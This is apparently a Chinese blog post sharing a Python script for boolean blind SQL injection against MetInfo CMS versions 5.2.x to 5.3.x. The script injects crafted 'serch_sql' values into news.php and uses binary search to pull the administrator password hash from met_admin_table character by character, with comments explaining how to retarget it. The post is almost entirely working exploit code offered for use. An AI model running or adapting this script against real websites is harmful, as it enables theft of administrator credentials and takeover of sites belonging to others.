MetInfo5.2.X-5.3.X盲注脚本(二分法)

☯KK | I AM KK:


#coding=utf-8


__author__ = '小亭&KK---http://molok.lofter.com'


import requests


headers = {


'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63'


}


keyword = '2013-12-26'#设置判断返回结果差异的关键字,可根据实际情况修改


datalength = 0


host = 'http://127.0.0.1/MetInfov5.2.10'#需要测试的网站




GetlengthPayload = '/news/news.php?lang=cn&class2=5&serch_sql=as a join met_admin_table as b where if(length(b.admin_pass)>%d,1,0) limit 3,1-- sd&imgproduct=xxxx'




GetDataPayload   = '/news/news.php?lang=cn&class2=5&serch_sql=as a join met_admin_table as b where if(ascii(substr(b.admin_pass,%d,1))>%d,1,0) limit 3,1-- sd&imgproduct=xxxx'


#获取的是met_admin_table表中的admin_pass字段值,可根据需要做出更改




#使用二分法判断


def HalfOfIt(payload,maximum,minimum,index=None):


    #index为None时:跑数据的长度


    #index != None 时:跑数据的内容


    requesturl = host+payload


    ave = (maximum+minimum)/2


    if index == None:


        requesturl = requesturl % (ave)


    else:


        requesturl = requesturl % (index,ave)


    content = requests.get(requesturl,headers=headers).content


    #There are two values left to guess


    if maximum-minimum == 1:


        #当最大值和最小值相差1的时候,ave = (maximum+minimum)/2


        # ave的大小和最小值一样,所以要是关键词存在,则说明ascii比最小值大,所以返回最大值


        if keyword in content:


            return maximum


        else:


            return minimum


    if keyword in content:


        #minimum  <---  ave


        #如果关键词存在,说明ascii值大于平均值,所以最小值改为平均值


        return HalfOfIt(payload,maximum,ave,index)


    else:


        #maximum  <---  ave


        #如果关键词不存在,说明ascii值小于平均值,所以最小值改为平均值


        return HalfOfIt(payload,ave,minimum,index)




def GetInfoLength():


    global datalength


    maximum = 35#一般MD5值都是32位的,所以最大值要高于32


    minimum = 1


    datalength = HalfOfIt(GetlengthPayload,maximum,minimum)


    print("[数据长度:]===>%d" % (datalength))




GetInfoLength()


if datalength == 0:


    print('出错啦')


    exit(-1)




output = '[数据内容]===>'


#最小值到最大值对应ASCII表,目的是将特殊字符和数字字母包含到里面


maximum = 126


minimum = 33


for index in range(1,datalength+1):


    retval = HalfOfIt(GetDataPayload,maximum,minimum,index)


    output += chr(retval)#ord和chr两个内置的函数,用于字符与ASCII码之间的转换。


    print(output)


评论
热度(4)
  1. buildingbuilding 转载了此文字  到 补丁君
  2. 千秋雪building 转载了此文字
 

© 千秋雪 | Powered by LOFTER